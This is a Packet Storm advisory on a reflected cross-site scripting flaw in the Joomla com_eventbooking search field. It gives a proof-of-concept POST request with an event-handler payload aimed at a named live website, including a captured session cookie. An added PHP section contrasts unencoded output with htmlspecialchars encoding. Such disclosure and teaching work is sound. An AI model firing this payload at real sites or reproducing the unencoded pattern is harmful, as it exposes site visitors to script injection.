Joomla Eventbooking Cross Site Scripting

2014-11-13T00:00:00
ID PACKETSTORM:129099
Type packetstorm
Reporter Jagriti Sahu
Modified 2014-11-13T00:00:00

Description

                                        
`##################################################################################################  
#Exploit Title : Joomla com_eventbooking component XSS vulnerability  
#Author : Jagriti Sahu AKA incredible  
#Download Link : https://github.com/Jasonudoo/platform/tree/master/components/com_eventbooking  
#Date : 13/11/2014  
#Discovered at : IndiShell Lab  
#Love to : Surbhi, Mrudula and Harry  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
  
  
The Joomla component com_eventbooking does not filter data in the search parameter  
and is therefore affected by an XSS vulnerability.  
  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
The vulnerability is due to the search parameter in the search box, which is prone to XSS.  
  
  
////////////////  
/// POC ////  
///////////////  
  
POC image=http://oi61.tinypic.com/aol6qc.jpg  
  
  
http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101  
  
POST /index.php?option=com_eventbooking&Itemid=101 HTTP/1.1  
Host: eastvicevents.com.au  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101  
Cookie: 230d19898da30be54648f536cbac3652=ca2096bf2055cf7c31462f8f056f84d4; __utma=222259084.1320908457.1415891642.1415891642.1415891642.1; __utmb=222259084.18.10.1415891642; __utmc=222259084; __utmz=222259084.1415891642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 177  
  
search=test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//&category_id=13&location_id=474&option=com_eventbooking&Itemid=101&view=search  
  
HTTP/1.1 200 OK  
Content-Encoding: gzip  
Vary: Accept-Encoding  
Date: Thu, 13 Nov 2014 16:10:17 GMT  
Server: LiteSpeed  
X-Powered-By: PHP/5.5.18  
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"  
Content-Type: text/html; charset=utf-8  
Cache-Control: no-cache  
Pragma: no-cache  
Connection: close  
`
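
The `search` value in the request above carries a double quote followed by an event-handler attribute, which only has an effect when the value is written into an HTML attribute without encoding. The following PHP is an added example, not the component's own code: the `render_search_box_*` helpers are hypothetical, and reflection into an `<input>` value attribute is an assumption. It compares the unencoded pattern with attribute-context output encoding and lists the attributes a parser sees in each case.

```php
<?php
// Added example: hypothetical helpers, not code from com_eventbooking.

// Unencoded pattern: the request value is concatenated into the attribute.
function render_search_box_unsafe(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string.
function render_search_box_safe(string $search): string
{
    $encoded = htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search" value="' . $encoded . '" />';
}

// Parse the markup and return the attribute names present on the <input>.
function input_attribute_names(string $html): array
{
    libxml_use_internal_errors(true);   // keep parser warnings off the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $input = $doc->getElementsByTagName('input')->item(0);
    if ($input === null) {
        return [];
    }
    $names = [];
    foreach ($input->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// The search value from the POST body shown in the advisory.
$search = 'test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//';

// Unencoded: the quote closes value="" and a separate attribute appears.
echo implode(', ', input_attribute_names(render_search_box_unsafe($search))), PHP_EOL;
// Encoded: the whole string stays inside value="" as text.
echo implode(', ', input_attribute_names(render_search_box_safe($search))), PHP_EOL;
```

Encoding belongs at the point of output and must match the context; `htmlspecialchars` with `ENT_QUOTES` is appropriate for quoted HTML attributes and element text, not for values placed inside script blocks or URLs.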